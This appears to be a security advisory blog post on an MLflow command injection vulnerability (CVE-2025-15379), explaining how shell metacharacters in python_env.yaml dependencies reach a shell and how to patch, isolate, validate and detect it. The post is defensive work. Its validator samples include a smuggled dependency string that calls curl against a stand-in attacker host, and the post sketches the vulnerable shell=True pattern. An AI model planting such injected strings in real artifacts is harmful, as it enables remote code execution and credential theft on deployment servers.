COSMICBYTEZLABS
CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

Security · Critical · CVE-2025-15379


A maximum-severity command injection vulnerability in MLflow's model serving container initialization allows attackers to execute arbitrary OS commands via a maliciously crafted python_env.yaml dependency file when deploying models with env_manager=LOCAL.

Dylan H.

Security Team

March 30, 2026
7 min read


Executive Summary

CVE-2025-15379 is a maximum-severity (CVSS 10.0) command injection vulnerability in the MLflow open-source machine learning platform. The flaw resides in the _install_model_dependencies_to_env() function, which is invoked when deploying a model with env_manager=LOCAL. MLflow reads dependency specifications from the model artifact's python_env.yaml file and constructs a shell command to install them — without sanitizing the dependency strings before passing them to the OS.

An attacker who can supply a malicious python_env.yaml (e.g., via a compromised artifact, supply chain attack, or direct artifact upload) can achieve full remote code execution on the MLflow server or deployment target.

CVSS Score: 10.0 (Critical — Maximum)


Vulnerability Overview

CVE ID: CVE-2025-15379
CVSS Score: 10.0 (Critical, Maximum)
Type: Command Injection / Remote Code Execution
Attack Vector: Network
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
Affected Component: Model serving container initialization
Vulnerable Function: _install_model_dependencies_to_env()
Trigger Condition: env_manager=LOCAL model deployment
Payload Vector: python_env.yaml dependency strings

Affected Products

Product: MLflow model serving (env_manager=LOCAL)
Affected Versions: All unpatched versions
Remediation: Apply vendor patch immediately

Technical Analysis

Root Cause

When deploying an MLflow model with env_manager=LOCAL, the platform calls _install_model_dependencies_to_env() to set up the runtime environment. This function reads the dependencies or build_dependencies fields from the model's python_env.yaml file and constructs a pip install command using those values.

The dependency strings are not sanitized before shell execution. An attacker can inject shell metacharacters — semicolons, backticks, $() substitution, or pipe characters — directly into the dependency specification to execute arbitrary commands.

Vulnerable Code Pattern (Conceptual)

The vulnerability arises when unsanitized user-controlled values from python_env.yaml are passed into a subprocess call that evaluates shell syntax:

# Pseudocode -- the vulnerable pattern:
# dep_string = read from python_env.yaml (attacker-controlled)
# subprocess.run(f"pip install {dep_string}", shell=True)  <-- shell=True + unsanitized input
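The danger is easy to demonstrate with a harmless stand-in for pip (`echo` here, on a POSIX shell); the dependency string below is a hypothetical example, not the actual exploit payload:

```python
import subprocess

# Hypothetical attacker-controlled dependency string from python_env.yaml
dep = "numpy; echo INJECTED"

# With shell=True, the semicolon terminates the intended command and the
# injected `echo INJECTED` runs as a second shell command.
result = subprocess.run(f"echo install {dep}", shell=True,
                        capture_output=True, text=True)
print(result.stdout)
# install numpy
# INJECTED
```

The same string passed as a list element with `shell=False` would reach the program as a single literal argument, metacharacters included.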

The safe pattern requires:

  1. Using shell=False with a list of arguments (never a concatenated string)
  2. Validating dependency strings against an allowlist regex before passing to subprocess
  3. Using a sandbox or virtualenv with restricted shell access
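Points 1 and 2 can be sketched as follows; the allowlist regex and helper name are illustrative assumptions, and the real fix remains the vendor patch:

```python
import re
import subprocess
import sys

# Illustrative allowlist for PEP 508-style requirement strings
REQ_PATTERN = re.compile(r"^[A-Za-z0-9._\-\[\]<>=!~, ]+$")

def install_dependency(dep: str) -> None:
    """Validate the dependency string, then invoke pip as an argument
    list with shell=False (subprocess's default), so shell
    metacharacters are never interpreted."""
    if not REQ_PATTERN.fullmatch(dep):
        raise ValueError(f"Rejected suspicious dependency string: {dep!r}")
    subprocess.run([sys.executable, "-m", "pip", "install", dep], check=True)
```

A string like ``requests`id` `` fails the allowlist and never reaches subprocess at all.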

Malicious python_env.yaml Example

A crafted python_env.yaml designed to exploit this vulnerability would embed shell metacharacters into a dependency specification:

python_version: "3.10"
build_dependencies:
  - pip
dependencies:
  - "numpy; <injected-shell-command>"
  - "requests<shell-substitution-payload>"

When MLflow processes these dependency strings with shell=True, the injected content executes as a shell command on the host.

Attack Scenarios

Scenario 1: Compromised Model Registry

1. Attacker gains write access to MLflow artifact store (misconfigured S3, NFS, etc.)
2. Attacker modifies python_env.yaml in a widely-used model artifact
3. Any deployment with env_manager=LOCAL triggers command injection
4. Full RCE on the deployment server — credentials, environment variables, data exfiltrated

Scenario 2: Supply Chain via Model Hub

1. Attacker publishes a poisoned model to a public or shared model registry
2. Organization downloads and deploys the model with env_manager=LOCAL
3. _install_model_dependencies_to_env() executes attacker's injected commands
4. Complete compromise of the inference or training server

Scenario 3: Insider Threat in Multi-Tenant MLflow

1. Malicious data scientist uploads a model with a crafted python_env.yaml
2. MLOps engineer deploys the model using standard MLflow deployment commands
3. Command injection fires during environment setup — before model validation
4. MLOps server compromised, lateral movement into CI/CD or cloud environment

Scenario 4: CI/CD Pipeline Injection

1. MLflow is part of an automated training and deployment pipeline
2. A compromised training dataset or upstream dependency poisons python_env.yaml
3. Automated deployment triggers command injection without human review
4. Pipeline runner compromise cascades to production infrastructure

Why CVSS 10.0?

The maximum CVSS score reflects every factor being at maximum severity:

  • Attack Vector: Network — exploitable over the network
  • Privileges Required: None — no authentication needed if artifact store is accessible
  • User Interaction: None — no victim action required beyond normal model deployment
  • Scope: Changed — impact extends beyond MLflow to the host OS
  • All CIA impacts: High — full confidentiality, integrity, and availability compromise

Impact Assessment

Full Remote Code Execution: Arbitrary commands execute as the MLflow process user
Credential Theft: Access to environment variables, cloud credentials, API keys
Data Exfiltration: Model artifacts, training data, and IP accessible to attacker
Infrastructure Pivot: Compromise of the deployment server enables lateral movement
Supply Chain Risk: Poisoned models in public registries can compromise all downstream deployments
Persistent Backdoors: Write access via RCE enables persistent attacker presence
Ransomware Staging: Model serving servers often have access to datasets and storage

Remediation

Priority Action: Patch or Restrict Immediately

# Check your MLflow version
python -c "import mlflow; print(mlflow.__version__)"
 
# Upgrade to the patched version
pip install --upgrade mlflow
 
# Verify upgrade
python -c "import mlflow; print(mlflow.__version__)"

Avoid env_manager=LOCAL for Untrusted Artifacts

# Avoid env_manager=LOCAL when deploying untrusted or externally sourced models

# Instead of LOCAL (vulnerable):
# mlflow models serve -m <model_uri> --env-manager local

# Use virtualenv or conda isolation:
mlflow models serve -m <model_uri> --env-manager virtualenv

# Or build a Docker image for full isolation:
mlflow models build-docker -m <model_uri> -n my-model-image

Validate python_env.yaml Before Deployment

import yaml
import re
 
SAFE_PACKAGE_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.\[\]<>=!,\s]+$')
 
def validate_python_env(python_env_path):
    with open(python_env_path) as f:
        config = yaml.safe_load(f)
 
    for dep in config.get("dependencies", []):
        if not SAFE_PACKAGE_PATTERN.match(str(dep)):
            raise ValueError(f"Suspicious dependency string: {dep}")
 
    for dep in config.get("build_dependencies", []):
        if not SAFE_PACKAGE_PATTERN.match(str(dep)):
            raise ValueError(f"Suspicious build dependency: {dep}")
 
    return True
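Applied to a few sample dependency strings (the injected one is a hypothetical stand-in, not the real payload), the allowlist behaves as intended:

```python
import re

# Same allowlist used in the validator above
SAFE_PACKAGE_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.\[\]<>=!,\s]+$')

deps = [
    "numpy>=1.24,<2.0",                       # legitimate version spec: passes
    "scikit-learn[alldeps]",                  # legitimate extras syntax: passes
    "numpy; curl http://attacker.example/x",  # injected command: rejected
]
for dep in deps:
    verdict = "OK  " if SAFE_PACKAGE_PATTERN.match(dep) else "FAIL"
    print(f"{verdict} {dep}")
```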

Container-Based Isolation

# Deploy MLflow models in isolated Docker containers
FROM python:3.10-slim

# Install dependencies before dropping privileges
RUN pip install --no-cache-dir mlflow

# Non-root user for container execution
RUN useradd -m -u 1000 mlflow
USER mlflow

WORKDIR /app
COPY --chown=mlflow model/ ./model/

# Limited network access -- no outbound during inference;
# network policies enforced at orchestrator level

Detection Indicators

  • Unexpected outbound network connections during model deployment: potential exploitation (shell callback)
  • Unusual processes spawned by the MLflow service account: command injection execution
  • New files in /tmp, cron directories, or home directories: post-exploitation activity
  • python_env.yaml files containing shell metacharacters (;, `, $()): malicious artifact indicator
  • pip install commands with semicolons or command substitution in package names: attack attempt
  • MLflow deployment failures with unusual error messages during env setup: attempted injection blocked
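The fourth indicator can be hunted for with a short audit script; the artifact-root path in the usage comment is a placeholder for your own store:

```python
import re
from pathlib import Path

# Shell metacharacters that should never appear in a dependency spec
SHELL_META = re.compile(r"[;|&`$]")

def scan_python_env(path: Path) -> list:
    """Return (line number, line) pairs from a python_env.yaml that
    contain shell metacharacters."""
    hits = []
    for lineno, line in enumerate(path.read_text().splitlines(), 1):
        if SHELL_META.search(line):
            hits.append((lineno, line.strip()))
    return hits

# Usage sketch: scan every python_env.yaml under an artifact root
# for env_file in Path("/mlflow/artifacts").rglob("python_env.yaml"):
#     for lineno, line in scan_python_env(env_file):
#         print(f"{env_file}:{lineno}: {line}")
```

Flagged lines are indicators for review, not proof of compromise; legitimate YAML rarely needs these characters in dependency fields.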

Post-Remediation Checklist

  1. Patch all MLflow installations to the version containing the fix
  2. Audit python_env.yaml files in all registered model artifacts — check for injected commands
  3. Review deployment logs — look for unexpected command execution during recent model deployments
  4. Assume breach if env_manager=LOCAL was used with externally sourced models — conduct forensic review
  5. Rotate all credentials accessible to the MLflow deployment environment
  6. Implement artifact signing — cryptographically verify model artifact integrity before deployment
  7. Switch to container deployment — use mlflow models build-docker for isolation
  8. Restrict artifact store write access — limit who can upload or modify model artifacts
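Item 6 (artifact integrity) can be approximated with digest pinning until full signing is in place; this is a minimal sketch, assuming the expected digest comes from a trusted, separately stored manifest:

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Compute the SHA-256 digest of a model artifact file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_artifact(path: Path, expected_digest: str) -> None:
    """Refuse to deploy when the artifact digest does not match the
    pinned value from the trusted manifest."""
    actual = sha256_of(path)
    if actual != expected_digest:
        raise RuntimeError(f"Artifact integrity check failed for {path}: {actual}")
```

Digest pinning detects tampering after registration; proper cryptographic signing additionally binds the artifact to a publisher identity.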

References

  • NVD — CVE-2025-15379
  • MLflow GitHub Repository
  • OWASP — Command Injection
  • Related: CVE-2025-15036 — MLflow Path Traversal in Archive Extraction (CVSS 9.6)
Tags: CVE-2025-15379, MLflow, Command Injection, RCE, Remote Code Execution, Model Serving, Machine Learning Security, NVD
